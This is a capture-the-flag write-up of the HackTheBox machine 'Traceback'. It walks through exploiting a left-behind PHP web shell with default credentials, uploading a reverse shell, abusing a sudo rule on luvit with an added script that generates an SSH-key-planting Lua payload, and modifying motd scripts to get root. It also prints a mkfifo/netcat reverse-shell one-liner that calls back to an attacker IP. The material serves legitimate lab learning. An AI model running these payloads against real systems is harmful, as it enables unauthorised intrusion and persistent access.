HackTheBox Writeup — Traceback
Hack the Box is an online platform where you can practice your penetration testing skills. This is my write-up for the HackTheBox machine ‘Traceback’, which runs a Linux OS and is one of the ‘Easy’ rated machines.
1. Summary
The initial foothold on this box involves finding a hidden web shell left behind on an already compromised web server and using it to upload our own PHP reverse shell, which gives us a shell as the ‘Webmin’ user. To escalate, we abuse a sudo rule that lets Webmin run a Luvit binary (a Lua runtime) as the Sysadmin user. Finally, to reach Root we modify one of the ‘Message of the Day’ (motd) scripts in /etc/update-motd.d/, which pam_motd runs as root whenever anyone logs in via SSH.
2. Enumeration and Initial Foothold (Webmin)
The port scan results show just two services: SSH on port 22 and a web application on port 80. Visiting the web application in a browser, I was presented with the page below.
Inspecting the page showed no functionality to interact with, but the HTML source contains the following comment:
<!--Some of the best web shells that you might need ;) -->
This comment prompted some OSINT, which led me to a popular GitHub repository containing numerous PHP web shells. The description at the top of that repository matched the HTML comment word for word, so I assumed I was on the right track: one of those web shells had been left on this server. Requesting http://10.10.10.181/smevk.php presented the login page below.
I tried admin:admin straight away, the default credentials documented in the GitHub repository, and was logged in. This gave me a web console with a file upload function, so I downloaded the PHP reverse shell script from PenTestMonkey, modified it to point at my IP and listening port, saved it as ‘JDR.php’ and uploaded it through the console.
Back on my Kali machine I started a netcat listener on port 9090 and, in another terminal window, issued the following curl command to make an HTTP GET request for JDR.php, which makes the server execute it:
curl http://10.10.10.181/JDR.php
This allowed me to pop a reverse shell on the Traceback machine and gain an initial foothold as the ‘Webmin’ user.
3. User Shell — Sysadmin
After upgrading my shell, I ran a Linux enumeration script which returned three promising results.
- A strange ‘note.txt’ file within the Webmin home directory.
- Webmin is allowed (via sudo) to run a Luvit binary in the Sysadmin home directory as the Sysadmin user.
- The Sysadmin home directory also contains a hidden SSH directory.
In short, Luvit is a Lua runtime, so it will execute any Lua script we hand it, and because we can run it as Sysadmin via sudo, a Lua script that appends our SSH public key to the Sysadmin’s authorized_keys file (inside the hidden .ssh directory found above) will let us log in as Sysadmin with our private key.
I then used a Python SimpleHTTPServer to host the Lua script temporarily and downloaded this to the Traceback machine using wget.
With the malicious Lua script now in Webmin’s home directory, I used the command below (with the path to the script as its argument) to run it with Sysadmin privileges.
sudo -u sysadmin /home/sysadmin/luvit
Returning back to my Kali machine I logged in as Sysadmin via SSH.
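As an added example (not the write-up’s own script), here is a small POSIX shell helper that generates the Lua payload for this step from a public key file. The key path (~/.ssh/id_ed25519.pub), the payload name (privesc.lua) and the HTTP port used to host it are assumptions, not taken from the original; the generated Lua uses only io and os, standard Lua libraries that luvit provides, so it needs no luvit-specific API.

```shell
#!/bin/sh
# Added example, not the original write-up's script.
# Generates the Lua payload that luvit will run as sysadmin. Assumed names:
# the attacker's key is ~/.ssh/id_ed25519.pub and the output is privesc.lua.
#
# Usage on Kali:    ./gen_payload.sh ~/.ssh/id_ed25519.pub privesc.lua
#                   python3 -m http.server 8000
# Usage on target:  wget http://10.10.17.13:8000/privesc.lua
#                   sudo -u sysadmin /home/sysadmin/luvit privesc.lua
# Then from Kali:   ssh -i ~/.ssh/id_ed25519 sysadmin@10.10.10.181

SYSADMIN_SSH=/home/sysadmin/.ssh

# write_lua_payload PUBKEY_FILE OUT_FILE
# Emits a Lua script that appends PUBKEY_FILE's contents to sysadmin's
# authorized_keys. The key is embedded in a Lua long string [==[...]==] so
# nothing in it needs escaping. mkdir/chmod make sure the .ssh directory and
# the file have the permissions sshd insists on.
write_lua_payload() {
    pubkey=$(cat "$1") || return 1
    cat > "$2" <<EOF
-- Lua payload: run as sysadmin via sudo -u sysadmin /home/sysadmin/luvit $(basename "$2")
local dir = "$SYSADMIN_SSH"
local key = [==[$pubkey]==]
os.execute("mkdir -p " .. dir .. " && chmod 700 " .. dir)
local f = assert(io.open(dir .. "/authorized_keys", "a"))
f:write(key, "\\n")
f:close()
os.execute("chmod 600 " .. dir .. "/authorized_keys")
EOF
}

# Only generate when both arguments are given, so the file can also be sourced.
[ "$#" -eq 2 ] && write_lua_payload "$1" "$2"
```

The sudo rule runs luvit as sysadmin, so everything the Lua script does (creating the directory, appending the key, fixing permissions) happens as that user, which is exactly what sshd requires of an authorized_keys file.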
4. Root
Continuing the privilege escalation, I inspected the processes running on the Traceback machine using pspy64. I noticed that there was a process running as root that copies the ‘Message of the Day’ (motd) files from the backups directory into the /etc/update-motd.d/ directory every 30 seconds.
Navigating into this directory we can see that the Sysadmin user has write permissions on these files, and after inspecting the contents of the 00-header file I noticed that this is the same content that is displayed to the terminal when logging in with SSH (see image 12).
This means that if we append a reverse shell command to this file, the next SSH login as Sysadmin triggers pam_motd, which runs the scripts in /etc/update-motd.d/ as root, so our command executes as root and we get a root shell. The catch is timing: the edit must be made and the login completed before the root process restores the file from the backups directory. The reverse shell command that worked for me is the one below, appended to the end of the ‘00-header’ file (10.10.17.13 is my Kali machine’s IP).
rm /tmp/f1; mkfifo /tmp/f1; cat /tmp/f1 | /bin/sh -i 2>&1 | nc 10.10.17.13 8888 > /tmp/f1
With a netcat listener on port 8888 on the Kali machine, quickly logging in as Sysadmin via SSH drops us into a root shell, where we can retrieve the root flag.
5. Conclusion
This was my fifth owned machine on HackTheBox and definitely one of my favourites, although I wasn’t too keen on the initial stage as it felt like guess work rather than working something out. Nevertheless I learnt something new every step of the way, including learning a little bit about Lua and the importance of checking running processes.
Keep an eye out for my future write-ups!